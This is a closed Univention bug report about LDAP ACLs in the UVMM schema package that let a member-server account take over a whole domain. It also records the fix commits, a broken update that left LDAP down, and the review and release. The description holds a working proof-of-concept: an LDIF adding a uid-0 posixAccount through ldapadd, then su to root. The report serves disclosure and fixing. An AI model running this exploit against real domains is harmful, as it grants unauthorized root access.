Bug 41723 - univention-virtual-machine-manager-schema - take over complete domain as memberserver
univention-virtual-machine-manager-schema - take over complete domain as memb...
Status: CLOSED FIXED
Product: UCS
Classification: Unclassified
Component: Virtualization - UVMM
UCS 4.1
Other Linux
: P5 critical (vote)
: UCS 4.1-2-errata
Assigned To: Florian Best
Stefan Gohmann
:
Depends on: 41715 41797
Blocks:
  Show dependency treegraph
 
Reported: 2016-07-04 14:38 CEST by Florian Best
Modified: 2021-06-23 07:29 CEST (History)
4 users (show)

See Also:
What kind of report is it?: Security Issue
What type of bug is this?: ---
Who will be affected by this bug?: ---
How will those affected feel about the bug?: ---
User Pain:
Enterprise Customer affected?:
School Customer affected?:
ISV affected?:
Waiting Support:
Flags outvoted (downgraded) after PO Review:
Ticket number:
Bug group (optional): Security
Max CVSS v3 score:


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Florian Best univentionstaff 2016-07-04 14:38:30 CEST
The ACL rules in the package univention-virtual-machine-manager-schema have to be adjusted.

+++ This bug was initially created as a clone of Bug #41715 +++

Preconditions: Having a memberserver/slave/master/backup or any object underneath of cn=memberserver,cn=computers,$ldap_base / cn=dc,cn=computers,$ldap_base.

root@xen3:~# eval "$(ucr shell)"
root@xen3:~# udm container/cn create --set name=memberserver --position "cn=computers,$ldap_base"
Object created: cn=memberserver,cn=computers,dc=school,dc=local
root@xen3:~# eval "$(ucr shell)"; udm computers/memberserver create --set name=hacker --position="cn=memberserver,cn=computers,$ldap_base" --set password=univention
Object created: cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local

# now PWN it
$ cat posix_account.ldif
dn: univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local
univentionAppID: foobar
objectClass: univentionApp
objectClass: posixAccount
uid: hacker
cn: hacker
uidNumber: 0
gidNumber: 0
homeDirectory: /root
loginShell: /bin/bash
userPassword:: e2NyeXB0fSQ2JEguMDVWRC9EdVBueUlvTkMkeUlKd1lCWk5XVTRma0NWOFNFMHFpUDd5REIzSVFXbkZQUjA4VWkuTUtjSFFCWnZ5N09JbVUyYXZiMjJHVFlHbHpCZzRGanR0TVlDVXo4RldTcDBKbC8=
$ ldapadd -D cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local -w univention < posix_account.ldif
adding new entry "univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local"
$ su hacker
Passwort: 
hacker@xen3:~# id
uid=0(hacker) gid=0(root) Gruppen=0(root)
Comment 1 Florian Best univentionstaff 2016-07-04 19:57:49 CEST
univention-virtual-machine-manager-schema.yaml:
r70818 | YAML Bug #41723

univention-virtual-machine-manager-schema (6.0.1-2):
r70815 | Bug #41723: uniupdatecopyright
r70814 | Bug #41723: restrict access to UVMM object classes for memberservers and domaincontrollers
Comment 2 Daniel Tröder univentionstaff 2016-07-05 10:14:43 CEST
Crashes my update and leaves system without a working LDAP server:

univention-virtual-machine-manager-schema (6.0.1-2.75.201607041950) wird eingerichtet ...
Neue Version der Konfigurationsdatei /etc/univention/templates/files/etc/ldap/slapd.conf.d/66univention-ldap-server_acl-master-uvmm wird installiert ...
Multifile: /etc/ldap/slapd.conf
Restarting ldap server(s).
Stopping ldap server(s): slapd ...done.
Starting ldap server(s): slapd ...DITContentRuleDescription = "(" whsp
numericoid whsp ; StructuralObjectClass identifier
[ "NAME" qdescrs ]
[ "DESC" qdstring ]
[ "OBSOLETE" whsp ]
[ "AUX" oids ] ; Auxiliary ObjectClasses
[ "MUST" oids ] ; AttributeTypes
[ "MAY" oids ] ; AttributeTypes
[ "NOT" oids ] ; AttributeTypes
whsp ")"
failed.
577a88dc /usr/share/univention-ldap/schema/univention-virtual-machine-manager.schema: line 270 ditcontentrule: Unexpected token before ) DITContentRuleDescription = "(" whsp numericoid whsp ; StructuralObjectClass identifier [ "NAME" qdescrs ] [ "DESC" qdstring ] [ "OBSOLETE" whsp ] [ "AUX" oids ] ; Auxiliary ObjectClasses [ "MUST" oids ] ; AttributeTypes [ "MAY" oids ] ; AttributeTypes [ "NOT" oids ] ; AttributeTypes whsp ")" slapschema: bad configuration file!.
2016-07-04 18:03:40.443670527+02:00 (in joinscript_init)
ucs-school-ldap-acls-master (14.0.1-7.76.201607041949) wird eingerichtet ...
2016-07-04 18:03:40.841997337+02:00 (in joinscript_init)
Traceback (most recent call last):
File "/usr/share/univention-directory-manager-tools/univention-cli-server", line 222, in doit
output = univention.admincli.admin.doit(arglist)
File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 395, in doit
out=_doit(arglist)
File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 522, in _doit
co=univention.admin.config.config(configRegistry['ldap/master'])
File "/usr/lib/pymodules/python2.7/univention/admin/config.py", line 38, in __init__
base=univention.admin.uldap.getBaseDN(host)
File "/usr/lib/pymodules/python2.7/univention/admin/uldap.py", line 68, in getBaseDN
result = l.search_s('', ldap.SCOPE_BASE, 'objectClass=*', ['NamingContexts'])
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 559, in search_s
return self.search_ext_s(base,scope,filterstr,attrlist,attrsonly,None,None,timeout=self.timeout)
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 918, in search_ext_s
return self._apply_method_s(SimpleLDAPObject.search_ext_s,*args,**kwargs)
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 865, in _apply_method_s
self.reconnect(self._uri,retry_max=self._retry_max,retry_delay=self._retry_delay)
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 839, in reconnect
raise e
SERVER_DOWN: {'desc': "Can't contact LDAP server"}
Traceback (most recent call last):
File "/usr/share/univention-directory-manager-tools/univention-cli-server", line 222, in doit
output = univention.admincli.admin.doit(arglist)
File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 395, in doit
out=_doit(arglist)
File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 522, in _doit
co=univention.admin.config.config(configRegistry['ldap/master'])
File "/usr/lib/pymodules/python2.7/univention/admin/config.py", line 38, in __init__
base=univention.admin.uldap.getBaseDN(host)
File "/usr/lib/pymodules/python2.7/univention/admin/uldap.py", line 68, in getBaseDN
result = l.search_s('', ldap.SCOPE_BASE, 'objectClass=*', ['NamingContexts'])
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 559, in search_s
return self.search_ext_s(base,scope,filterstr,attrlist,attrsonly,None,None,timeout=self.timeout)
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 918, in search_ext_s
return self._apply_method_s(SimpleLDAPObject.search_ext_s,*args,**kwargs)
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 865, in _apply_method_s
self.reconnect(self._uri,retry_max=self._retry_max,retry_delay=self._retry_delay)
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 839, in reconnect
raise e
SERVER_DOWN: {'desc': "Can't contact LDAP server"}
Traceback (most recent call last):
File "/usr/share/univention-directory-manager-tools/univention-cli-server", line 222, in doit
output = univention.admincli.admin.doit(arglist)
File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 395, in doit
out=_doit(arglist)
File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 522, in _doit
co=univention.admin.config.config(configRegistry['ldap/master'])
File "/usr/lib/pymodules/python2.7/univention/admin/config.py", line 38, in __init__
base=univention.admin.uldap.getBaseDN(host)
File "/usr/lib/pymodules/python2.7/univention/admin/uldap.py", line 68, in getBaseDN
result = l.search_s('', ldap.SCOPE_BASE, 'objectClass=*', ['NamingContexts'])
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 559, in search_s
return self.search_ext_s(base,scope,filterstr,attrlist,attrsonly,None,None,timeout=self.timeout)
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 918, in search_ext_s
return self._apply_method_s(SimpleLDAPObject.search_ext_s,*args,**kwargs)
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 865, in _apply_method_s
self.reconnect(self._uri,retry_max=self._retry_max,retry_delay=self._retry_delay)
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 839, in reconnect
raise e
SERVER_DOWN: {'desc': "Can't contact LDAP server"}
Traceback (most recent call last):
File "/usr/share/univention-directory-manager-tools/univention-cli-server", line 222, in doit
output = univention.admincli.admin.doit(arglist)
File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 395, in doit
out=_doit(arglist)
File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 522, in _doit
co=univention.admin.config.config(configRegistry['ldap/master'])
File "/usr/lib/pymodules/python2.7/univention/admin/config.py", line 38, in __init__
base=univention.admin.uldap.getBaseDN(host)
File "/usr/lib/pymodules/python2.7/univention/admin/uldap.py", line 68, in getBaseDN
result = l.search_s('', ldap.SCOPE_BASE, 'objectClass=*', ['NamingContexts'])
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 559, in search_s
return self.search_ext_s(base,scope,filterstr,attrlist,attrsonly,None,None,timeout=self.timeout)
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 918, in search_ext_s
return self._apply_method_s(SimpleLDAPObject.search_ext_s,*args,**kwargs)
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 865, in _apply_method_s
self.reconnect(self._uri,retry_max=self._retry_max,retry_delay=self._retry_delay)
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 839, in reconnect
raise e
SERVER_DOWN: {'desc': "Can't contact LDAP server"}
Traceback (most recent call last):
File "/usr/share/univention-directory-manager-tools/univention-cli-server", line 222, in doit
output = univention.admincli.admin.doit(arglist)
File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 395, in doit
out=_doit(arglist)
File "/usr/lib/pymodules/python2.7/univention/admincli/admin.py", line 522, in _doit
co=univention.admin.config.config(configRegistry['ldap/master'])
File "/usr/lib/pymodules/python2.7/univention/admin/config.py", line 38, in __init__
base=univention.admin.uldap.getBaseDN(host)
File "/usr/lib/pymodules/python2.7/univention/admin/uldap.py", line 68, in getBaseDN
result = l.search_s('', ldap.SCOPE_BASE, 'objectClass=*', ['NamingContexts'])
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 559, in search_s
return self.search_ext_s(base,scope,filterstr,attrlist,attrsonly,None,None,timeout=self.timeout)
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 918, in search_ext_s
return self._apply_method_s(SimpleLDAPObject.search_ext_s,*args,**kwargs)
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 865, in _apply_method_s
self.reconnect(self._uri,retry_max=self._retry_max,retry_delay=self._retry_delay)
File "/usr/lib/python2.7/dist-packages/ldap/ldapobject.py", line 839, in reconnect
raise e
SERVER_DOWN: {'desc': "Can't contact LDAP server"}
Comment 3 Florian Best univentionstaff 2016-07-05 10:41:42 CEST
univention-virtual-machine-manager-schema (6.0.1-3):
r70824 | Bug #41723: fix syntax error in LDAP schema
Comment 4 Stefan Gohmann univentionstaff 2016-07-12 09:37:20 CEST
YAML: OK

Code review: OK
 r70814: OK
 r70815: OK
 r70824: OK

Tests: OK
  KVM: OK
  EC2: OK
  OpenStack: OK
Comment 5 Florian Best univentionstaff 2016-07-12 10:01:06 CEST
I just saw a DC backup which couldn't join because the schema wasn't installed.

57849f5f /etc/ldap/slapd.conf: line 166: unknown attr "@univentionVirtualMachine" in to clause 57849f5f <access clause> ::= access to <what> [ by <who> [ <access> ] [ <control> ] ]+ <what> ::= bin boot dev etc home initrd.img initrd.img.install initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin selinux srv sys tmp usr var vmlinuz vmlinuz.install vmlinuz.old | dn[.<dnstyle>=<DN>] [filter=<filter>] [attrs=<attrspec>] <attrspec> ::= <attrname> [val[/<matchingRule>][.<attrstyle>]=<value>] | <attrlist> <attrlist> ::= <attr> [ , <attrlist> ] <attr> ::= <attrname> | @<objectClass> | !<objectClass> | entry | children <who> ::= [ bin boot dev etc home initrd.img initrd.img.install initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin selinux srv sys tmp usr var vmlinuz vmlinuz.install vmlinuz.old | anonymous | users | self | dn[.<dnstyle>]=<DN> ] [ realanonymous | realusers | realself | realdn[.<dnstyle>]=<DN> ] [dnattr=<attrname>] [realdnattr=<attrname>] [group[/<objectclass>[/<attrname>]][.<style>]=<group>] [peername[.<peernamestyle>]=<peer>] [sockname[.<style>]=<name>] [domain[.<domainstyle>]=<domain>] [sockurl[.<style>]=<url>] [dynacl/<name>[/<options>][.<dynstyle>][=<pattern>]] [ssf=<n>] [transport_ssf=<n>] [tls_ssf=<n>] [sasl_ssf=<n>] <style> ::= exact | regex | base(Object) <dnstyle> ::= base(Object) | one(level) | sub(tree) | children | exact | regex <attrstyle> ::= exact | regex | base(Object) | one(level) | sub(tree) | children <peernamestyle> ::= exact | regex | ip | ipv6 | path <domainstyle> ::= exact | regex | base(Object) | sub(tree) <access> ::= [[real]self]{<level>|<priv>} <level> ::= none|disclose|auth|compare|search|read|{write|add|delete}|manage <priv> ::= {=|+|-}{0|d|x|c|s|r|{w|a|z}|m}+ <control> ::= [ stop | continue | break ] dynacl: <name>=ACI <pattern>=<attrname> slapschema: bad configuration file!.
Comment 6 Florian Best univentionstaff 2016-07-12 12:35:47 CEST
(In reply to Florian Best from comment #5)
> I just saw a DC backup which couldn't join because the schema wasn't
> installed.
The join seems to have succeeded.
Comment 7 Stefan Gohmann univentionstaff 2016-07-12 16:15:19 CEST
(In reply to Florian Best from comment #5)
> I just saw a DC backup which couldn't join because the schema wasn't
> installed.
> 
> 57849f5f /etc/ldap/slapd.conf: line 166: unknown attr
> "@univentionVirtualMachine" in to clause 57849f5f <access clause> ::= access
> to <what> [ by <who> [ <access> ] [ <control> ] ]+ <what> ::= bin boot dev
> etc home initrd.img initrd.img.install initrd.img.old lib lib64 lost+found
> media mnt opt proc root run sbin selinux srv sys tmp usr var vmlinuz
> vmlinuz.install vmlinuz.old | dn[.<dnstyle>=<DN>] [filter=<filter>]
> [attrs=<attrspec>] <attrspec> ::= <attrname>
> [val[/<matchingRule>][.<attrstyle>]=<value>] | <attrlist> <attrlist> ::=
> <attr> [ , <attrlist> ] <attr> ::= <attrname> | @<objectClass> |
> !<objectClass> | entry | children <who> ::= [ bin boot dev etc home
> initrd.img initrd.img.install initrd.img.old lib lib64 lost+found media mnt
> opt proc root run sbin selinux srv sys tmp usr var vmlinuz vmlinuz.install
> vmlinuz.old | anonymous | users | self | dn[.<dnstyle>]=<DN> ] [
> realanonymous | realusers | realself | realdn[.<dnstyle>]=<DN> ]
> [dnattr=<attrname>] [realdnattr=<attrname>]
> [group[/<objectclass>[/<attrname>]][.<style>]=<group>]
> [peername[.<peernamestyle>]=<peer>] [sockname[.<style>]=<name>]
> [domain[.<domainstyle>]=<domain>] [sockurl[.<style>]=<url>]
> [dynacl/<name>[/<options>][.<dynstyle>][=<pattern>]] [ssf=<n>]
> [transport_ssf=<n>] [tls_ssf=<n>] [sasl_ssf=<n>] <style> ::= exact | regex |
> base(Object) <dnstyle> ::= base(Object) | one(level) | sub(tree) | children
> | exact | regex <attrstyle> ::= exact | regex | base(Object) | one(level) |
> sub(tree) | children <peernamestyle> ::= exact | regex | ip | ipv6 | path
> <domainstyle> ::= exact | regex | base(Object) | sub(tree) <access> ::=
> [[real]self]{<level>|<priv>} <level> ::=
> none|disclose|auth|compare|search|read|{write|add|delete}|manage <priv> ::=
> {=|+|-}{0|d|x|c|s|r|{w|a|z}|m}+ <control> ::= [ stop | continue | break ]
> dynacl: <name>=ACI <pattern>=<attrname> slapschema: bad configuration file!.

I've split it into Bug #41782.

(In reply to Florian Best from comment #6)
> (In reply to Florian Best from comment #5)
> > I just saw a DC backup which couldn't join because the schema wasn't
> > installed.
> The join seems to have succeeded.

Verified.
Comment 8 Janek Walkenhorst univentionstaff 2016-07-21 15:16:22 CEST
<http://errata.software-univention.de/ucs/4.1/214.html>